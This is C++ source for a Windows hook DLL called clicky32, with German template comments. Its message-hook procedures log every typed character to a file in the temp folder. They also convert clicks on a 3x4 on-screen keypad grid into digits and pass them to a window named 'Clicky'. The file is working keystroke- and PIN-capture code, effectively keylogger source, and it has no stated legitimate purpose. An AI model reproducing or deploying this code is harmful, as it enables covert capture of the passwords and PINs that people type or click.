// clicky32.cpp : Implementierung von DLL-Exporten.


#include "stdafx.h"
#include "resource.h"
#include "clicky32.h"

#define TEXTBUF_SIZE 32768
#define LOG(T) Log(_T(T), sizeof(_T(T)))

#define OFF_LEFT 50
#define OFF_TOP 160
#define KEY_SIZE 72

class Cclicky32Module : public CAtlDllModuleT< Cclicky32Module >
{
public :
	DECLARE_LIBID(LIBID_clicky32Lib)
	DECLARE_REGISTRY_APPID_RESOURCEID(IDR_CLICKY32, "{3DD21096-D058-47C5-AA54-C21986BB6526}")
};

Cclicky32Module _AtlModule;

void CALLBACK GetLogPath(DWORD dwSize, TCHAR * buffer) {
	GetTempPath(dwSize, buffer);
	size_t length;
	StringCbLength(buffer, dwSize, &length);
	if (buffer[length - 1] != '\\')
		StringCbCat(buffer, dwSize, _T("\\"));
	StringCbCat(buffer, dwSize, _T("clicky.log"));
}

void CALLBACK Log(const TCHAR * text, size_t size) {
	HANDLE hLog = NULL;
	static TCHAR pLogPath[TEXTBUF_SIZE];
	static char pBuffer[TEXTBUF_SIZE];

	GetLogPath(TEXTBUF_SIZE, pLogPath);
	hLog = CreateFile(pLogPath, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_WRITE_THROUGH, NULL);
	if (hLog == NULL)
		MessageBox(NULL, _T("clicky32.dll cannot write to the log."), _T("Error loading clicky"), MB_OK | MB_ICONSTOP);

	CT2A pText(text);
	size_t length = strnlen(pText, TEXTBUF_SIZE);
	
	SetFilePointer(hLog, NULL, NULL, FILE_END);
	DWORD dwWritten;
	WriteFile(hLog, (LPCVOID) pText, (DWORD) length, &dwWritten, NULL);
	FlushFileBuffers(hLog);

	CloseHandle(hLog);
}

void rLog(LPCTSTR pText, size_t length) {
	HWND hClicky = FindWindow(_T("Clicky"), NULL);
	if (hClicky == NULL)
		LOG("\ncannot find Clicky window\n");
	else
		SendMessage(hClicky, WM_SETTEXT, NULL, (LPARAM) pText);
}

LRESULT CALLBACK GetMsgProc(int code, WPARAM wParam, LPARAM lParam) {
	if (code < 0)
		return CallNextHookEx(NULL, code, wParam, lParam);

	if (code == HC_ACTION) {
		PMSG pMsg = (PMSG) lParam;
		switch (pMsg->message) {
			static TCHAR buf[TEXTBUF_SIZE];
			case WM_CHAR:
				if (pMsg->wParam < 32)
					StringCbPrintf(buf, TEXTBUF_SIZE, _T("^%c"), pMsg->wParam + 64);
				else
					StringCbPrintf(buf, TEXTBUF_SIZE, _T("%c"), pMsg->wParam);

				Log(buf, TEXTBUF_SIZE);
				break;
		}
	}

	return CallNextHookEx(NULL, code, wParam, lParam);
}

LRESULT CALLBACK GetMouseMsgProc(int code, WPARAM wParam, LPARAM lParam) {
	if (code < 0)
		return CallNextHookEx(NULL, code, wParam, lParam);

	if (code == HC_ACTION) {
		PMSG pMsg = (PMSG) lParam;
		switch (pMsg->message) {
			static TCHAR buf[TEXTBUF_SIZE];
			case WM_LBUTTONUP:
				int x = GET_X_LPARAM(pMsg->lParam); 
				int y = GET_Y_LPARAM(pMsg->lParam);
				if (x >= OFF_LEFT && x <= OFF_LEFT + 3 * KEY_SIZE && y >= OFF_TOP && y <= OFF_TOP + 4 * KEY_SIZE) {
					x = x - OFF_LEFT;
					y = y - OFF_TOP;
					x = x / KEY_SIZE;
					y = y / KEY_SIZE;
					int n;
					if (y < 3)
						n = y * 3 + x;
					else {
						switch (x) {
						case 0:
							n = -1;
							break;
						case 1:
							n = 9;
							break;
						case 2:
							n = -2;
						}
					}
					if (n >= 0)
						StringCbPrintf(buf, TEXTBUF_SIZE, _T("[%d]"), n);
					else
						if (n == -1)
							StringCbCopy(buf, sizeof(_T("[|<-]")), _T("[|<-]"));
						else
							StringCbCopy(buf, sizeof(_T("[<-]")), _T("[<-]"));

					rLog(buf, TEXTBUF_SIZE);
				}
				break;
		}
	}
	return CallNextHookEx(NULL, code, wParam, lParam);
}

#ifdef _MANAGED
#pragma managed(push, off)
#endif

// DLL-Einstiegspunkt
extern "C" BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)
{
    return _AtlModule.DllMain(dwReason, lpReserved); 
}

#ifdef _MANAGED
#pragma managed(pop)
#endif




// Wird verwendet, um festzustellen, ob die DLL von OLE entladen werden kann.
STDAPI DllCanUnloadNow(void)
{
    return _AtlModule.DllCanUnloadNow();
}


// Gibt eine Klassenfactory zurck, um ein Objekt vom angeforderten Typ zu erstellen.
STDAPI DllGetClassObject(REFCLSID rclsid, REFIID riid, LPVOID* ppv)
{
    return _AtlModule.DllGetClassObject(rclsid, riid, ppv);
}


// DllRegisterServer - Fgt der Systemregistrierung Eintrge hinzu.
STDAPI DllRegisterServer(void)
{
    // Registriert Objekt, Typelib und alle Schnittstellen in Typelib.
    HRESULT hr = _AtlModule.DllRegisterServer();
	return hr;
}


// DllUnregisterServer - Entfernt Eintrge aus der Systemregistrierung.
STDAPI DllUnregisterServer(void)
{
	HRESULT hr = _AtlModule.DllUnregisterServer();
	return hr;
}

